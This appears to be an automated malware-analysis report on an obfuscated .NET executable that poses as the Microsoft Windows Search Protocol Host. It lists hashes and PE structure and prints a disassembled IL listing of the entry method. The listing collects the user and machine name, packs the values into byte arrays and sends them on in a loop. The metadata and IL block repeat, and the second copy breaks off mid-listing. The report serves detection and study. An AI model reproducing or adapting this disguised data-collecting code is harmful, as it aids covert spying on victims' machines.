Suspicious
Suspect

3d8e1e059c4924d652994cb74c893cfa

PE Executable
|
MD5: 3d8e1e059c4924d652994cb74c893cfa
|
Size: 481.54 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash
Hash Value
MD5
3d8e1e059c4924d652994cb74c893cfa
Sha1
8995c47fb784ed603d30585bd5be021aaef25d02
Sha256
e4bfe3c56e96d2d6979b9b0af00d783ccca027a3ff87b9d4e1aa7dc3b6208a21
Sha384
9fddc1d488ab48f59feedc922d723ef912e8e80a8f5293f0087eecd7681d4d651a498e1a5fe8543f434fa9e8ba4cca32
Sha512
aaa6776ffa4ea49c1b5855f534e80777b461e4656b19bdf000e70713560c001c795f2b2810d82c9959d2f41b66dfb43eea6005975039d7aae617d54f72f69a29
SSDeep
6144:DS+iqed/619prNJaLuLap5xR62eaCMyCgNUoI7bzqQcoJYg6:+2edYTr3aLCeXghIj3JYt
TLSH
6EA44A147FA98A08D540153E469E2A09CBEAD1F221326307370AFF615D45DDEEE2D3EB

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
yad7i4kpm66q2iv3t0s5lzbhrr
px3f7aqmhctkn72bt5v
Information
Name
Value
Module Name

Microsoft Windows Search Protocol Host

Full Name

Microsoft Windows Search Protocol Host

EntryPoint

System.Void WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::XpWBMmLzlEJV(System.String[])

Scope Name

Microsoft Windows Search Protocol Host

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

Microsoft Windows Search Protocol Host

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.7.2

Total Strings

494

Main Method

System.Void WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::XpWBMmLzlEJV(System.String[])

Main IL Instruction Count

182

Main IL

call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::qUBdBhLlgUVdooV() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::HwZDMdsHll() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::MsEhCqBASazqgtSOhMf() stloc V_3 nop <null> ldloc V_3 call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::pWblrheGNctrP() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::BwvItFTYkrqgeYVvSy() br IL_000E: nop call System.Void WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::BwvItFTYkrqgeYVvSy() call System.Void WmFCTOGVEoMLPqnHUmcv.awCRRfYYazFPwEvHn::jgoBTbaFRL() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::UlIZovJaKYODAOatHZqUEJrfo call System.String WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::nWUTqwdusM() call System.String VudrsYShsxUldsluJ.pJhHerEzSSTDafAqjFIgoDv::dODlTesJAVFCRmYLoYAeEFFer(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::mcuHPYAjIGqghNVR call System.Void mwltDFeVwgBcJnXnfKXSKoRqD.ShffEOOCiirES::CERCMDqSlxoGrPGLnPHXUf() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::mcuHPYAjIGqghNVR call System.Boolean dwfNaabXSatKyfibA.VHFbZxATavRSJHtDEH::oWXySjCANKVAYWadNLvop(System.String) brtrue IL_0080: call System.Void VudrsYShsxUldsluJ.TDeogDnQjAERDDIHYYyOPa::PWOIDcRcSdJqc() leave IL_02AE: ret call System.Void VudrsYShsxUldsluJ.TDeogDnQjAERDDIHYYyOPa::PWOIDcRcSdJqc() call System.Void mwltDFeVwgBcJnXnfKXSKoRqD.JvZElhBIZKvCzwlrzHjygmI::nLRpKWmWLObNPe() ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh ldfld System.Boolean WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::gUHOLJfsWiaSEqECIuZdz brtrue IL_0299: call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::xVljQSFhgfslhm() ldsfld System.String 
WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::YTldlLangMtBox call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::ytbmTnnnDc() newarr System.Char dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::FsJtOLvGaqqQ() call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::qULunqgIbfuZnut() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random mwltDFeVwgBcJnXnfKXSKoRqD.JvZElhBIZKvCzwlrzHjygmI::hfWBsMEhfFxLkQYeNFx ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::YBTydloUMyRylpKIcIwybsA() newarr System.Char dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::wzeNPUbQBOBoXS() call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::EfrhpYiWlUmweyuQfBFCdG() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::FsWAwXnWkKTrSkLKoN() ldelem.ref <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::tscYxSGyWmRPLyEmpSY() newarr System.Char dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::zxyBmLGcgTrRoANicUZip() call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::RjTuHtNxWsPcevtal() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh callvirt System.Void WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::EDTIrOzNuvUNYbngIUPe() ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh ldloc V_1 call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::LeRCvzaLkWJUtqvagPirD() ldelem.ref <null> ldloc V_2 ldsfld System.Random mwltDFeVwgBcJnXnfKXSKoRqD.JvZElhBIZKvCzwlrzHjygmI::hfWBsMEhfFxLkQYeNFx ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 
System.Random::Next(System.Int32) ldelem.ref <null> callvirt System.Void WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::HHNFhZgsOwCIqUJBfIhLuM(System.String,System.String) ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh ldfld System.Boolean WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::gUHOLJfsWiaSEqECIuZdz brfalse IL_0299: call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::xVljQSFhgfslhm() ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::OixyCMVSoCimWK() newarr System.Object dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::OnTTvIroByZg() call System.String WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::uXQgfqKUWa() call System.String VudrsYShsxUldsluJ.pJhHerEzSSTDafAqjFIgoDv::dODlTesJAVFCRmYLoYAeEFFer(System.String) stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::OestiyQjEwx() call System.String WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::TpBMQPyyjByeYyothnOfefhTk() call System.String VudrsYShsxUldsluJ.pJhHerEzSSTDafAqjFIgoDv::dODlTesJAVFCRmYLoYAeEFFer(System.String) stelem.ref <null> call System.Byte[] WRlFQcXoBYywkyRRNMnJC.pxIeUUIvQumFxrtYYO::EmjMRRtLMKEFIqtodzOXHOHao(System.Object[]) callvirt System.Void WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::aYppKZtmZMlLmjFToWyg(System.Byte[]) ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh newobj System.Void mwltDFeVwgBcJnXnfKXSKoRqD.xHDzcALpGPuW::.ctor(WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY) stfld mwltDFeVwgBcJnXnfKXSKoRqD.xHDzcALpGPuW WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::UpMJvByseSdIXg ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh ldsfld 
WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh newobj System.Void mwltDFeVwgBcJnXnfKXSKoRqD.stoGZVpvcpLx::.ctor(WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY) stfld mwltDFeVwgBcJnXnfKXSKoRqD.stoGZVpvcpLx WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::JjCRlaSqsXrIqygDwlQzSCC ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::pShHmGTlSRbOXH() newarr System.Object dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::WuwAcgRDKJo() call System.String WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::txJtxTcqDeRdfNwtc() call System.String VudrsYShsxUldsluJ.pJhHerEzSSTDafAqjFIgoDv::dODlTesJAVFCRmYLoYAeEFFer(System.String) stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::XuXKrVFFqJg() call System.Byte[] mwltDFeVwgBcJnXnfKXSKoRqD.JvZElhBIZKvCzwlrzHjygmI::RQbocKZgLBSItDwZSvqOEoL() stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::sFvlwCdVbutoIw() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::alXBAPpKemEeMSOMY stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::hYOWxxCwruHktSBO() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::bqNSuMYxhIjAEM stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::NgHXlgGHgTcdAj() call System.String System.Environment::get_UserName() call System.String WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::wsrhrxdhHuSnHhbsVBoqDeCiv() call System.String VudrsYShsxUldsluJ.pJhHerEzSSTDafAqjFIgoDv::dODlTesJAVFCRmYLoYAeEFFer(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::uBXhbnjRpJ() ldsfld System.String 
WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::NFlyIHqGLTm stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::qpSkDZfgbco() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::pJMKTmWCqixbDdwsrLS stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::wrHOQeaSqLGpruTnaeOSOgpRp() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::SkJsSTkVdvxBrGesec stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::PCxTHZFDapTYSnPqNeidsJFs() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::yDOOwojfWejIYEJffxAfvZsJj stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::xNWiQBqZUOX() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::drmOfIJufLxPAB stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::WEhjoTdTBLaCYTLj() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::gXlfcxqcAlKQML stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::EGwENKLiVKody() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::fiVkjcxrtQnvEBYKEf stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::ZsVraBtEqcZEmmUKxqHNPIaQJ() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::NsSDjXjbXBvetoEPqXYz stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::VBSIpqDMBJCckhTAQUfIXZOK() call System.String mwltDFeVwgBcJnXnfKXSKoRqD.JvZElhBIZKvCzwlrzHjygmI::gdqbZjWinCKstkIC() stelem.ref <null> call System.Byte[] WRlFQcXoBYywkyRRNMnJC.pxIeUUIvQumFxrtYYO::EmjMRRtLMKEFIqtodzOXHOHao(System.Object[]) callvirt System.Void WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::aYppKZtmZMlLmjFToWyg(System.Byte[]) call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::xVljQSFhgfslhm() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY 
WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh pop <null> leave IL_02AE: ret ret <null>

Module Name

Microsoft Windows Search Protocol Host

Full Name

Microsoft Windows Search Protocol Host

EntryPoint

System.Void WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::XpWBMmLzlEJV(System.String[])

Scope Name

Microsoft Windows Search Protocol Host

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

Microsoft Windows Search Protocol Host

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.7.2

Total Strings

494

Main Method

System.Void WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::XpWBMmLzlEJV(System.String[])

Main IL Instruction Count

182

Main IL

call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::qUBdBhLlgUVdooV() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::HwZDMdsHll() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::MsEhCqBASazqgtSOhMf() stloc V_3 nop <null> ldloc V_3 call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::pWblrheGNctrP() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::BwvItFTYkrqgeYVvSy() br IL_000E: nop call System.Void WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::BwvItFTYkrqgeYVvSy() call System.Void WmFCTOGVEoMLPqnHUmcv.awCRRfYYazFPwEvHn::jgoBTbaFRL() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::UlIZovJaKYODAOatHZqUEJrfo call System.String WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::nWUTqwdusM() call System.String VudrsYShsxUldsluJ.pJhHerEzSSTDafAqjFIgoDv::dODlTesJAVFCRmYLoYAeEFFer(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::mcuHPYAjIGqghNVR call System.Void mwltDFeVwgBcJnXnfKXSKoRqD.ShffEOOCiirES::CERCMDqSlxoGrPGLnPHXUf() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::mcuHPYAjIGqghNVR call System.Boolean dwfNaabXSatKyfibA.VHFbZxATavRSJHtDEH::oWXySjCANKVAYWadNLvop(System.String) brtrue IL_0080: call System.Void VudrsYShsxUldsluJ.TDeogDnQjAERDDIHYYyOPa::PWOIDcRcSdJqc() leave IL_02AE: ret call System.Void VudrsYShsxUldsluJ.TDeogDnQjAERDDIHYYyOPa::PWOIDcRcSdJqc() call System.Void mwltDFeVwgBcJnXnfKXSKoRqD.JvZElhBIZKvCzwlrzHjygmI::nLRpKWmWLObNPe() ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh ldfld System.Boolean WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::gUHOLJfsWiaSEqECIuZdz brtrue IL_0299: call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::xVljQSFhgfslhm() ldsfld System.String 
WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::YTldlLangMtBox call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::ytbmTnnnDc() newarr System.Char dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::FsJtOLvGaqqQ() call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::qULunqgIbfuZnut() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random mwltDFeVwgBcJnXnfKXSKoRqD.JvZElhBIZKvCzwlrzHjygmI::hfWBsMEhfFxLkQYeNFx ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::YBTydloUMyRylpKIcIwybsA() newarr System.Char dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::wzeNPUbQBOBoXS() call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::EfrhpYiWlUmweyuQfBFCdG() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::FsWAwXnWkKTrSkLKoN() ldelem.ref <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::tscYxSGyWmRPLyEmpSY() newarr System.Char dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::zxyBmLGcgTrRoANicUZip() call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::RjTuHtNxWsPcevtal() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh callvirt System.Void WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::EDTIrOzNuvUNYbngIUPe() ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh ldloc V_1 call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::LeRCvzaLkWJUtqvagPirD() ldelem.ref <null> ldloc V_2 ldsfld System.Random mwltDFeVwgBcJnXnfKXSKoRqD.JvZElhBIZKvCzwlrzHjygmI::hfWBsMEhfFxLkQYeNFx ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 
System.Random::Next(System.Int32) ldelem.ref <null> callvirt System.Void WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::HHNFhZgsOwCIqUJBfIhLuM(System.String,System.String) ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh ldfld System.Boolean WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::gUHOLJfsWiaSEqECIuZdz brfalse IL_0299: call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::xVljQSFhgfslhm() ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::OixyCMVSoCimWK() newarr System.Object dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::OnTTvIroByZg() call System.String WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::uXQgfqKUWa() call System.String VudrsYShsxUldsluJ.pJhHerEzSSTDafAqjFIgoDv::dODlTesJAVFCRmYLoYAeEFFer(System.String) stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::OestiyQjEwx() call System.String WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::TpBMQPyyjByeYyothnOfefhTk() call System.String VudrsYShsxUldsluJ.pJhHerEzSSTDafAqjFIgoDv::dODlTesJAVFCRmYLoYAeEFFer(System.String) stelem.ref <null> call System.Byte[] WRlFQcXoBYywkyRRNMnJC.pxIeUUIvQumFxrtYYO::EmjMRRtLMKEFIqtodzOXHOHao(System.Object[]) callvirt System.Void WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::aYppKZtmZMlLmjFToWyg(System.Byte[]) ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh newobj System.Void mwltDFeVwgBcJnXnfKXSKoRqD.xHDzcALpGPuW::.ctor(WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY) stfld mwltDFeVwgBcJnXnfKXSKoRqD.xHDzcALpGPuW WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::UpMJvByseSdIXg ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh ldsfld 
WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh newobj System.Void mwltDFeVwgBcJnXnfKXSKoRqD.stoGZVpvcpLx::.ctor(WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY) stfld mwltDFeVwgBcJnXnfKXSKoRqD.stoGZVpvcpLx WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::JjCRlaSqsXrIqygDwlQzSCC ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::pShHmGTlSRbOXH() newarr System.Object dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::WuwAcgRDKJo() call System.String WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::txJtxTcqDeRdfNwtc() call System.String VudrsYShsxUldsluJ.pJhHerEzSSTDafAqjFIgoDv::dODlTesJAVFCRmYLoYAeEFFer(System.String) stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::XuXKrVFFqJg() call System.Byte[] mwltDFeVwgBcJnXnfKXSKoRqD.JvZElhBIZKvCzwlrzHjygmI::RQbocKZgLBSItDwZSvqOEoL() stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::sFvlwCdVbutoIw() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::alXBAPpKemEeMSOMY stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::hYOWxxCwruHktSBO() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::bqNSuMYxhIjAEM stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::NgHXlgGHgTcdAj() call System.String System.Environment::get_UserName() call System.String WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::wsrhrxdhHuSnHhbsVBoqDeCiv() call System.String VudrsYShsxUldsluJ.pJhHerEzSSTDafAqjFIgoDv::dODlTesJAVFCRmYLoYAeEFFer(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::uBXhbnjRpJ() ldsfld System.String 
